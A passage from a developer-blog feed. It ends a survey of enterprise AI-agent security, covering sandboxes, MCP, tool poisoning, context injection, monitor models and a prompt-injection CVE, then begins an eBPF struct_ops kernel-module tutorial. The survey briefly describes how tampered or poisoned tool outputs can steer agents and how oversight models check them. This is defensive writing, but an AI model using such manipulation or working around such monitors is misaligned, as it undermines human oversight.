&lt;li&gt;Advanced Threat Defenses: The taxonomy of potential attacks (context injection, tool poisoning, cross-tool data leaks, etc.) is growing. Defenses like context signing (cryptographically signing tool outputs or important prompts to prevent tampering) have been suggested but not widely implemented. The idea there is: an agent would only trust tool outputs that come with a signature or hash, so an attacker who intercepts or modifies the content (like a man-in-the-middle on an HTTP tool) would fail. Similarly, isolating tools from each other (so one tool can't directly influence another except through the agent's vetted reasoning) is a challenge – currently the agent's memory is the meeting point of all tool data, making it a melting pot where a malicious output in one tool can affect decisions involving another.&lt;/li&gt;
&lt;li&gt;Benchmarking and Standards for Evaluation: The community has started benchmarks like MCP-SafetyBench and MSB, but we need continuous evaluation pipelines. Perhaps an open leaderboard where agent developers can submit their agent (with a certain set of tools and policies) to be evaluated against a suite of scenarios, similar to how language models are benchmarked on GLUE or SuperGLUE for NLP. This could drive competition and improvement in safety. Also, evaluation should include cost and latency metrics – an agent that is safe but takes hours or $$$ to complete a task isn't practical. Balancing efficiency with safety will likely lead to innovations like adaptive risk modes (the agent switches to a more cautious approach if it senses something sensitive, trading speed for safety dynamically).&lt;/li&gt;
&lt;li&gt;Human-Agent Interaction Paradigms: AgentBay's approach to HITL is one example of making agents more usable in the real world. There is still work to do on when and how an agent should ask for help. If it asks too often, it's not useful; if it asks too rarely, it might make an irrecoverable error. Finding that sweet spot (perhaps through reinforcement learning or feedback from users) is an ongoing area. Also, UI/UX research into how to present agent decisions to users in a clear way will be important (so users can confidently approve or deny actions). In enterprises, this might mean integrating agent controls into existing interfaces – e.g. showing an "AI agent suggestion" in a Jira ticket with a one-click approve.&lt;/li&gt;
&lt;li&gt;Cross-Organization Collaboration and Data Sharing: Enterprise agents often need to work across silos – e.g. an agent might coordinate between a supplier's system and the company's internal system. This raises questions of federated trust: how do you let an agent use two domains' tools in a secure way? This touches on things like standardizing how agents convey identity across org boundaries, and how audit logs are shared. The AAIF being under Linux Foundation hints at future inter-company standards to address this, since agents won't stop at the corporate firewall.&lt;/li&gt;
&lt;li&gt;Ethical and Compliance Considerations: Beyond security, enterprises must ensure agents comply with regulations and ethical norms. For example, if an agent interacts with personal data, privacy laws apply. How do we audit that an agent didn't retain or leak personal data beyond allowed purposes? Techniques like data tagging and tracking could be employed – marking certain outputs as containing sensitive info and preventing them from being used in contexts that aren't allowed. Ensuring AI explanations for decisions (especially if used in regulated domains) is another angle – if an agent makes a decision that affects a customer, one might need a rationale logged for compliance, which is tricky given the opaque reasoning of LLMs.&lt;/li&gt;
&lt;li&gt;Improving Model Robustness: Finally, at the heart is the LLM itself. There's ongoing research into fine-tuning models to be more resistant to manipulation (advantageous to safety but often at odds with capability). Techniques like constitutional AI or adversarial training on tool-use scenarios might yield models that inherently refuse certain dangerous actions or at least flag uncertainty. Also, specialized models for parsing and validating the agent's outputs (e.g. a secondary model that checks if a proposed action seems safe/rational) could be integrated. OpenAI and others are exploring "moderator" models that look at the main model's outputs. In agents, a "policy model" might examine the plan and tool uses and raise red flags for anything that violates training-time learned safe patterns.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Outlook: The next year will likely bring a maturation of the agent ecosystem akin to what 2010-2015 saw for cloud microservices – an explosion of tools and best practices to handle deployment, security, monitoring, and standardization. The formation of AAIF is a strong indicator that industry players see collaboration as the way forward; no one wants a fragmented, Wild West environment when so much is at stake (both in terms of safety and potential business value). We will probably see AgentOps teams emerge in organizations, analogous to MLOps, focused on managing and supervising fleets of agents. They'll use dashboards (like GitHub's Agent HQ mission control) to oversee agent activities across the enterprise. And just as DevOps developed guardrails and CI/CD for code, AgentOps will develop guardrails and continuous evaluation for autonomous AI behaviors.&lt;/p&gt;

&lt;p&gt;In conclusion, enterprise agent systems are transitioning from the lab to the real world, carrying with them both excitement (unprecedented automation capabilities) and caution (novel failure modes). Sandbox architectures and protocols like MCP have laid a foundation that makes these systems more modular, controllable, and interoperable than before. Yet, achieving a level of trust comparable to traditional software will require continued innovation in permission modeling, verification, and human oversight integration. The last half-year's progress has been remarkable – what was mostly sci-fi a year ago (multiple AIs collaborating on complex tasks with minimal human input) is now demonstrably feasible. The coming months will likely see pilots turn into production deployments in enterprises, each teaching new lessons. By actively sharing these lessons and converging on open standards and benchmarks, the community can accelerate the safe adoption of agentic AI. The end goal is an ecosystem where AI agents become reliable teammates – tirelessly automating drudgery and navigating complexity – while humans retain ultimate control and understanding of their behavior. The path to get there is challenging, but as this survey shows, the groundwork is rapidly being put in place.&lt;/p&gt;

&lt;h2&gt;
  
  
  References
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://www.infoq.com/news/2025/12/agent-sandbox-kubernetes/" rel="noopener noreferrer"&gt;Open-Source Agent Sandbox Enables Secure Deployment of AI Agents on Kubernetes&lt;/a&gt; - InfoQ News on Agent Sandbox, gVisor/Kata isolation, CRD for stateful agents, OWASP Top 10 for AI Agents&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://techinformed.com/google-launches-agent-sandbox-for-secure-ai-agents-on-kubernetes/" rel="noopener noreferrer"&gt;Google launches Agent Sandbox for secure AI agents on Kubernetes&lt;/a&gt; - TechInformed on gVisor isolation, pre-warmed pools (90% faster startups), Pod Snapshots&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.linuxfoundation.org/press/linux-foundation-announces-the-formation-of-the-agentic-ai-foundation" rel="noopener noreferrer"&gt;Linux Foundation Announces Formation of Agentic AI Foundation (AAIF)&lt;/a&gt; - MCP, Goose, AGENTS.md contributions; cross-industry support&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.infoq.com/articles/mcp-connector-for-building-smarter-modular-ai-agents/" rel="noopener noreferrer"&gt;MCP: The Universal Connector for Building Smarter, Modular AI Agents&lt;/a&gt; - InfoQ on MCP benefits (M×N to M+N integration, interoperability)&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://devblogs.microsoft.com/foundry/introducing-microsoft-agent-framework-the-open-source-engine-for-agentic-ai-apps/" rel="noopener noreferrer"&gt;Introducing Microsoft Agent Framework&lt;/a&gt; - Microsoft Foundry Blog on open standards (MCP, A2A, OpenAPI) and enterprise readiness&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://devblogs.microsoft.com/foundry/whats-new-in-microsoft-foundry-oct-nov-2025/" rel="noopener noreferrer"&gt;What's new in Microsoft Foundry (Oct/Nov 2025)&lt;/a&gt; - Microsoft Agent Framework updates&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.infoworld.com/article/4080888/github-launches-agent-hq-to-bring-order-to-ai-powered-coding.html" rel="noopener noreferrer"&gt;GitHub launches Agent HQ for AI-powered coding&lt;/a&gt; - InfoWorld on managing multiple coding agents with governance, audit, and mission control&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://github.com/advisories/GHSA-gjv4-ghm7-q58q" rel="noopener noreferrer"&gt;CVE-2025-53355: mcp-server-kubernetes command injection vulnerability&lt;/a&gt; - GitHub Advisory on unsanitized execSync and prompt-injection exploit via pod logs&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://arxiv.org/abs/2510.21236" rel="noopener noreferrer"&gt;Securing AI Agent Execution (arXiv:2510.21236)&lt;/a&gt; - Bühler et al. 2025: AgentBound permission framework for MCP tools, auto-policy generation (~80% accuracy)&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://arxiv.org/abs/2512.04367" rel="noopener noreferrer"&gt;AgentBay: A Hybrid Interaction Sandbox (arXiv:2512.04367)&lt;/a&gt; - Piao et al. 2025: unified sandbox with AI API control + live human takeover (48% higher task success with HITL)&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://openreview.net/pdf/d8cae2e9cc3facabfe822f031acdbe043046f70f.pdf" rel="noopener noreferrer"&gt;MCP-SafetyBench (OpenReview)&lt;/a&gt; - Lan et al. 2025: real MCP server benchmark, 30–48% attack success on tested LLMs&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://medium.com/@adnanmasood/model-context-protocol-mcp-attacks-threats-taxonomy-and-defenses-for-tool-using-llms-de65fbffedd3" rel="noopener noreferrer"&gt;MCP Attacks: Threats, Taxonomy, and Defenses&lt;/a&gt; - Adnan Masood on threat taxonomy for tool-using LLMs&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>agents</category>
      <category>sandbox</category>
      <category>ai</category>
    </item>
    <item>
      <title>eBPF Tutorial: Extending Kernel Subsystems with BPF struct_ops</title>
      <dc:creator>云微</dc:creator>
      <pubDate>Tue, 27 Jan 2026 07:20:44 +0000</pubDate>
      <link>https://forem.com/yunwei37/ebpf-tutorial-extending-kernel-subsystems-with-bpf-structops-2n3g</link>
      <guid>https://forem.com/yunwei37/ebpf-tutorial-extending-kernel-subsystems-with-bpf-structops-2n3g</guid>
      <description>&lt;p&gt;Have you ever wanted to extend kernel behavior—like adding a custom scheduler, network protocol, or security policy—but were put off by the complexity of writing and maintaining a full kernel module? What if you could define the logic directly in eBPF, with dynamic updates, safe execution, and programmable control, all without recompiling the kernel or risking system stability?&lt;/p&gt;

&lt;p&gt;This is the power of &lt;strong&gt;BPF struct_ops&lt;/strong&gt;. This advanced eBPF feature allows BPF programs to implement the callbacks of a kernel operations structure, effectively letting you "plug in" custom logic to extend kernel subsystems. It goes beyond simple tracing or filtering—you can now implement core kernel operations in BPF. For example, we use it to implement GPU scheduling and memory offloading extensions in GPU drivers (see &lt;a href="https://lpc.events/event/19/contributions/2168/" rel="noopener noreferrer"&gt;LPC 2024 talk&lt;/a&gt; and &lt;a href="https://github.com/eunomia-bpf/gpu_ext" rel="noopener noreferrer"&gt;gpu_ext project&lt;/a&gt;).&lt;/p&gt;

&lt;p&gt;In this tutorial, we will explore how to use &lt;code&gt;struct_ops&lt;/code&gt; to dynamically extend kernel subsystem behavior. We won't be using the common TCP congestion control example. Instead, we'll take a more fundamental approach that mirrors the extensibility seen with kfuncs. We will create a custom kernel module that defines a new, simple subsystem with a set of operations. This module will act as a placeholder, creating new attachment points for our BPF programs. Then, we will write a BPF program to implement the logic for these operations. This demonstrates a powerful pattern: using a minimal kernel module to expose a &lt;code&gt;struct_ops&lt;/code&gt; interface, and then using BPF to provide the full, complex implementation.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;The complete source code for this tutorial can be found here: &lt;a href="https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/struct_ops" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/struct_ops&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  Introduction to BPF struct_ops: Programmable Kernel Subsystems
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The Challenge: Extending Kernel Behavior Safely and Dynamically
&lt;/h3&gt;

&lt;p&gt;Traditionally, adding new functionality to the Linux kernel, such as a new file system, a network protocol, or a scheduler algorithm, requires writing a kernel module. While powerful, kernel modules come with significant challenges:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Complexity:&lt;/strong&gt; Kernel development has a steep learning curve and requires a deep understanding of kernel internals.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Safety:&lt;/strong&gt; A bug in a kernel module can easily crash the entire system. There are no sandboxing guarantees.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Maintenance:&lt;/strong&gt; Kernel modules must be maintained and recompiled for different kernel versions, creating a tight coupling with the kernel's internal APIs.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;eBPF has traditionally addressed these issues for tracing, networking, and security by providing a safe, sandboxed environment. However, most eBPF programs are attached to existing hooks (like tracepoints, kprobes, or XDP) and react to events. They don't typically &lt;em&gt;implement&lt;/em&gt; the core logic of a kernel subsystem.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Solution: Implementing Kernel Operations with BPF
&lt;/h3&gt;

&lt;p&gt;BPF &lt;code&gt;struct_ops&lt;/code&gt; bridges this gap. It allows a BPF program to implement the functions within a &lt;code&gt;struct_ops&lt;/code&gt;—a common pattern in the kernel where a structure holds function pointers for a set of operations. Instead of these pointers pointing to functions compiled into the kernel or a module, they can point to BPF programs.&lt;/p&gt;

&lt;p&gt;This is a paradigm shift. It's no longer just about observing or filtering; it's about &lt;em&gt;implementing&lt;/em&gt;. Imagine a kernel subsystem that defines a set of operations like &lt;code&gt;open&lt;/code&gt;, &lt;code&gt;read&lt;/code&gt;, &lt;code&gt;write&lt;/code&gt;. With &lt;code&gt;struct_ops&lt;/code&gt;, you can write BPF programs that serve as the implementation for these very functions.&lt;/p&gt;

&lt;p&gt;This approach is similar in spirit to how &lt;strong&gt;kfuncs&lt;/strong&gt; allow developers to extend the capabilities of BPF. With kfuncs, we can add custom helper functions to the BPF runtime by defining them in a kernel module. With &lt;code&gt;struct_ops&lt;/code&gt;, we take this a step further: we define a whole new &lt;em&gt;set of attach points&lt;/em&gt; for BPF programs, effectively creating a custom, BPF-programmable subsystem within the kernel.&lt;/p&gt;

&lt;p&gt;The benefits are immense:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Dynamic Implementation&lt;/strong&gt;: You can load, update, and unload the BPF programs implementing the subsystem logic on the fly, without restarting the kernel or the application.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Safety&lt;/strong&gt;: The BPF verifier ensures that the BPF programs are safe to run, preventing common pitfalls like infinite loops, out-of-bounds memory access, and system crashes.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Flexibility&lt;/strong&gt;: The logic is in the BPF program, which can be developed and updated independently of the kernel module that defines the &lt;code&gt;struct_ops&lt;/code&gt; interface.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Programmability&lt;/strong&gt;: Userspace applications can interact with and control the BPF programs, allowing for dynamic configuration and control of the kernel subsystem's behavior.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;In this tutorial, we will walk through a practical example of this pattern. We'll start with a kernel module that defines a new &lt;code&gt;struct_ops&lt;/code&gt; type, and then we'll write a BPF program to implement its functions.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Kernel Module: Defining the Subsystem Interface
&lt;/h2&gt;

&lt;p&gt;The first step is to create a kernel module that defines our new BPF-programmable subsystem. This module doesn't need to contain much logic itself. Its primary role is to define a &lt;code&gt;struct_ops&lt;/code&gt; type and register it with the kernel, creating a new attachment point for BPF programs. It also provides a mechanism to trigger the operations, which in our case will be a simple proc file.&lt;/p&gt;

&lt;p&gt;This approach is powerful because it separates the interface definition (in the kernel module) from the implementation (in the BPF program). The kernel module is stable and minimal, while the complex, dynamic logic resides in the BPF program, which can be updated at any time.&lt;/p&gt;

&lt;h3&gt;
  
  
  Complete Kernel Module: &lt;code&gt;module/hello.c&lt;/code&gt;
&lt;/h3&gt;

&lt;p&gt;Here is the complete source code for our kernel module. It defines a &lt;code&gt;struct_ops&lt;/code&gt; named &lt;code&gt;bpf_testmod_ops&lt;/code&gt; with three distinct operations that our BPF program will later implement.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;linux/init.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;linux/module.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;linux/kernel.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;linux/bpf.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;linux/btf.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;linux/btf_ids.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;linux/proc_fs.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;linux/seq_file.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;linux/bpf_verifier.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="cm"&gt;/* Define our custom struct_ops operations */&lt;/span&gt;
&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;test_1&lt;/span&gt;&lt;span class="p"&gt;)(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;test_2&lt;/span&gt;&lt;span class="p"&gt;)(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;b&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;test_3&lt;/span&gt;&lt;span class="p"&gt;)(&lt;/span&gt;&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;len&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;

&lt;span class="cm"&gt;/* Global instance that BPF programs will implement */&lt;/span&gt;
&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops&lt;/span&gt; &lt;span class="n"&gt;__rcu&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;testmod_ops&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="cm"&gt;/* Proc file to trigger the struct_ops */&lt;/span&gt;
&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;proc_dir_entry&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;trigger_file&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="cm"&gt;/* CFI stub functions - required for struct_ops */&lt;/span&gt;
&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;bpf_testmod_ops__test_1&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;bpf_testmod_ops__test_2&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;b&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;bpf_testmod_ops__test_3&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;len&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="cm"&gt;/* CFI stubs structure */&lt;/span&gt;
&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops&lt;/span&gt; &lt;span class="n"&gt;__bpf_ops_bpf_testmod_ops&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;test_1&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops__test_1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;test_2&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops__test_2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;test_3&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops__test_3&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;

&lt;span class="cm"&gt;/* BTF and verifier callbacks */&lt;/span&gt;
&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;bpf_testmod_ops_init&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;btf&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;btf&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="cm"&gt;/* Initialize BTF if needed */&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="n"&gt;bool&lt;/span&gt; &lt;span class="nf"&gt;bpf_testmod_ops_is_valid_access&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;off&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;size&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                        &lt;span class="k"&gt;enum&lt;/span&gt; &lt;span class="n"&gt;bpf_access_type&lt;/span&gt; &lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                        &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_prog&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;prog&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                        &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_insn_access_aux&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;info&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="cm"&gt;/* Allow all accesses for now */&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nb"&gt;true&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="cm"&gt;/* Allow specific BPF helpers to be used in struct_ops programs */&lt;/span&gt;
&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_func_proto&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;
&lt;span class="nf"&gt;bpf_testmod_ops_get_func_proto&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;enum&lt;/span&gt; &lt;span class="n"&gt;bpf_func_id&lt;/span&gt; &lt;span class="n"&gt;func_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_prog&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;prog&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="cm"&gt;/* Use base func proto which includes trace_printk and other basic helpers */&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;bpf_base_func_proto&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;func_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;prog&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_verifier_ops&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_verifier_ops&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;is_valid_access&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops_is_valid_access&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;get_func_proto&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops_get_func_proto&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;

&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;bpf_testmod_ops_init_member&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;btf_type&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;t&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                       &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;btf_member&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;member&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                       &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;kdata&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;udata&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="cm"&gt;/* No special member initialization needed */&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="cm"&gt;/* Registration function */&lt;/span&gt;
